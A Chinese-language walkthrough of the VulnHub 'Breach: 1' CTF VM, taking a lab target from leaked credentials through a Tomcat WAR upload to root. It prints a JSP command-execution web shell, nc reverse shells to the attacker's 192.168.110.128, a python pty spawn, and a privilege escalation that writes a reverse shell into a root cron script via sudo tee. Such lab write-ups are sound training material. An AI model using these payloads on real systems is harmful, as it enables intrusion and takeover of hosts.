vulnhub - BREACH: 1
描述
作為多部分系列中的第一部分,Breach 1.0 旨在成為初學者到中級的 boot2root/CTF 挑戰。解決將需要可靠的資訊收集和永續性相結合。不遺餘力。
VM 配置了靜態 IP 地址 (192.168.110.140),因此您需要將主機專用介面卡配置到此子網。
非常感謝 knightmare 和 rastamouse 的測試和反饋。
感謝 g0tmi1k 維護 #vulnhub 並主持我的第一個挑戰。
如果您遇到任何問題,您可以在 Twitter 上找到我:https://twitter.com/mrb3n813 或在 #vulnhub 中的 IRC 上。
期待撰寫文章,尤其是任何意外的本地/根路徑。
環境搭建
修改此處為
修改為主機模式,kali也要改
重啟後出現對應網路卡配置即為設定成功
資訊收集 - 80埠
nmap掃描埠,發現埠全開,還是優先關注常用的埠
訪問web頁面,檢視原始碼
<!DOCTYPE html>
<html>
<head>
<title>Welcome to Breach 1.0</title>
</head>
<body bgcolor="#000000">
<font color="green">
<p>Initech was breached and the board of directors voted to bring in their internal Initech Cyber Consulting, LLP division to assist. Given the high profile nature of the breach and nearly catastrophic losses, there have been many subsequent attempts against the company. Initech has tasked their TOP consultants, led by Bill Lumbergh, CISSP and Peter Gibbons, C|EH, SEC+, NET+, A+ to contain and perform analysis on the breach.</p>
<p>Little did the company realize that the breach was not the work of skilled hackers, but a parting gift from a disgruntled former employee on his way out. The TOP consultants have been hard at work containing the breach.
However, their own work ethics and the mess left behind may be the company's downfall.</p>
<center><a href="initech.html" target="_blank"> <img src="/images/milton_beach.jpg"
width=500 height=500> </a></center>
<!------Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->
</body>
</html>
得到註釋,解兩次base64得到一個使用者密碼
pgibbons:damnitfeel$goodtobeagang$ta
還有一個連結指向192.168.110.140/initech.html
,原始碼有註釋
<!--I'm sitting on a beach reading your email! -->
點選進入Employee portal會跳轉到http://192.168.110.140/impresscms/user.php
指紋探測
有登入框,嘗試登入。用剛才得到的使用者密碼
登入成功後發現有三封郵件
來自 ImpressCMS Admin
Posting sensitive content
Peter, yeahhh, I'm going to have to go ahead and ask you to have your team only post any sensitive artifacts to the admin portal. My password is extremely secure. If you could go ahead and tell them all that'd be great. -Bill
來自Michael Bolton
IDS/IPS system
Hey Peter,
I got a really good deal on an IDS/IPS system from a vendor I met at that happy hour at Chotchkie's last week!
-Michael
來自ImpressCMS Admin
FWD: Thank you for your purchase of Super Secret Cert Pro!
Peter, I am not sure what this is. I saved the file here: 192.168.110.140/.keystore Bob ------------------------------------------------------------------------------------------------------------------------------------------- From: registrar@penetrode.com Sent: 02 June 2016 16:16 To: bob@initech.com; admin@breach.local Subject: Thank you for your purchase of Super Secret Cert Pro! Please find attached your new SSL certificate. Do not share this with anyone!
這封提到了192.168.110.140/.keystore
,結合後文提到的SSL certificate
應該就是SSL證書
但是還沒有地方可以匯入使用,利用搜尋框,輸入SSL試試
SSL implementation test capture
Team - I have uploaded a pcap file of our red team's re-production of the attack. I am not sure what trickery they were using but I cannot read the file. I tried every nmap switch from my C|EH studies and just cannot figure it out. http://192.168.110.140/impresscms/_SSL_test_phase1.pcap They told me the alias, storepassword and keypassword are all set to 'tomcat'. Is that useful?? Does anyone know what this is? I guess we are securely encrypted now? -Peter p.s. I'm going fishing for the next 2 days and will not have access to email or phone.
果然搜到了一封郵件,告訴我們有一個流量包,別名、儲存密碼和金鑰都設定為“tomcat”
列出名為 "keystore" 的金鑰庫中儲存的證書和金鑰
keytool -list -keystore keystore
keytool -importkeystore -srckeystore keystore -destkeystore keystore -deststoretype pkcs12
生成符合要求的證書,開啟流量包
編輯->首選項->Protocols->TLS->RSA keys list
單擊key file 新增
看了一下各個流的資訊
<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>
這裡拿到了一個使用者密碼
Authorization: Basic dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC
解base64得到tomcat:Tt\5D8F(#!*u=G)4m7zB
,應該也是一個使用者密碼
還有一個可疑網頁https://192.168.110.140:8443/_M@nag3Me/html
,要開代理抓包訪問
資訊收集 - 8443埠
訪問時要求輸入使用者密碼
tomcat:Tt\5D8F(#!*u=G)4m7zB
登入成功
指紋探測
看到一個檔案上傳點,可傳war包
將shell.jsp打包成war包
<%
Runtime.getRuntime().exec(request.getParameter("shell"));
%>
shell.jsp單獨放置一個目錄,命令列下進入當前目錄
jar -cvf Login.war shell.jsp
訪問檔案位置https://192.168.110.140:8443/shell/shell.jsp
,有定時任務刪檔案,所以選擇反彈shell
nc -v 192.168.110.128 8888 -e /bin/bash
開啟互動
python -c 'import pty;pty.spawn("/bin/sh")'
檢視/etc/passwd
,關注以下兩個使用者
milton:x:1000:1000:Milton_Waddams,,,:/home/milton:/bin/bash
blumbergh:x:1001:1001:Bill Lumbergh,,,:/home/blumbergh:/bin/bash
再尋找一下可疑檔案,在/var/www/5446
下有兩個php檔案
檢視得到了mysql的使用者密碼
// Database Username
// Your database user account on the host
define( 'SDATA_DB_USER', 'root' );
// Database Password
// Password for your database user account
define( 'SDATA_DB_PASS', '' );
直接登入
mysql -u root -p
查表
拿到了使用者milton
的密碼,md5破解
得到密碼 thelaststraw
登入milton卻發現無法提權
$ su milton
su milton
Password: thelaststraw
milton@Breach:/var/www/5446$ sudo -l
sudo -l
[sudo] password for milton: thelaststraw
Sorry, user milton may not run sudo on Breach.
到處找痕跡。。
發現兩張圖片的許可權有區別,下載到本機
用exiftool
檢視
在bill.png
果然拿到了資訊,嘗試後發現是使用者blumbergh
的密碼
登入檢視可用提權方式
找到相應提權命令
那再次反彈shell
echo nc -v 192.168.110.128 7777 -e /bin/bash | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
注意!這裡不要自己立刻執行,這樣會提權失敗需要等它自己觸發